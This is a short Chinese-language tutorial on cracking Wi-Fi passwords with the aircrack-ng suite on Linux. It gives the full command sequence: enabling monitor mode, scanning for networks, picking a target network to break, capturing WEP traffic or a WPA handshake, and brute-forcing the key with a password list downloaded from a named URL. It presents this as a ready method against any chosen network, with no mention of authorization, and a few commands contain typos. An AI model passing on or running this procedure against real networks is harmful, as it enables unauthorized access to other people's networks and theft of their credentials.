測試環境在linux平臺下,我用的是ubuntu環境。ubuntu安裝可以直接用sudo apt-get install aircrack-nglinux應該可以用yum -y install aircrack-ng 來安裝,如果下載它的安裝包,沒有fangqian的話,非常慢。----------...
測試環境在linux平臺下,我用的是ubuntu環境。ubuntu安裝可以直接用sudo apt-get install aircrack-ng
linux應該可以用yum -y install aircrack-ng 來安裝,如果下載它的安裝包,沒有fangqian的話,非常慢。
------------------------------------------------------------------------------------
方法:
1.確保你的無線是打開的:ifconfig看是否有wlan0或別的無線適配器已經啟動,如果沒有,後面的步驟都執行不了
可以先用ifconfig -a看是否有無線適配器,再用ifconfig wlan0 up命令啟動無線適配器(wlan0為ifconfig -a中查找到的無線適配器名稱)
2.激活網卡為監聽模式:
sudo airmon-ng start wlan0
3.查看無線網路,開始抓取無線數據包
sudo airodump-ng mon0
註意:這裡的mon0是你的wlan開始監聽之後的別名,一般可能會出現的問題是:
rtl8187 - [phy1]SIOCSIFFLAGS: Name not unique on network
如果出現這個問題,按照這個來解決
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
sudo airodump-ng wlan0
或者:
airmon-ng check kill airmon-ng start <interface> airodump-ng wlan0mon
不過網路管理給關掉了
sudo servicenetwork-manager stop # 停止 nm服務
udo servicenetwork-manager start # 開啟 nm服務
如果一切沒有問題====》
這時就會顯示你當前可以搜索到的無線信號,PWR是信號值,數值越大表示信號越強,ESSID就是這個信號的名稱.ENC為加密方式(WEP最容易破,wpa,wpa2都只能暴力破解)
找到一個你希望破解的essid
4.確定目標後
sudo airodump-ng -c 6 --bssid target's MAC -w file mon0
-c 6是指這個信號的頻道 ,就是CH那個頻道
target's MAC 是你想要破解的MAC地址
file 是aircrack-ng 跟目標地址握手後保存的數據
5.收到足夠的包之後(即data),開始破解
sudo aircrack-ng file-01.cap
file-01.cap 就是握手後保存的數據
如果是wep類型的密碼,在收到足夠多的包之後(1w)可以直接破解
如果是wpa/wpa2類型的加密方式,則必須收到握手包之後才能開始暴力破解並且需要使用密碼文件(給出一個地址:http://static.hackersgarage.com/darkc0de.lst.gz)如果密碼足夠複雜的話這樣的密碼文件也是不夠的,需要自己去下更複雜的加密文件
sudo aircrack-ng -w dic file-01.cap
破解成功就能拿到密碼了
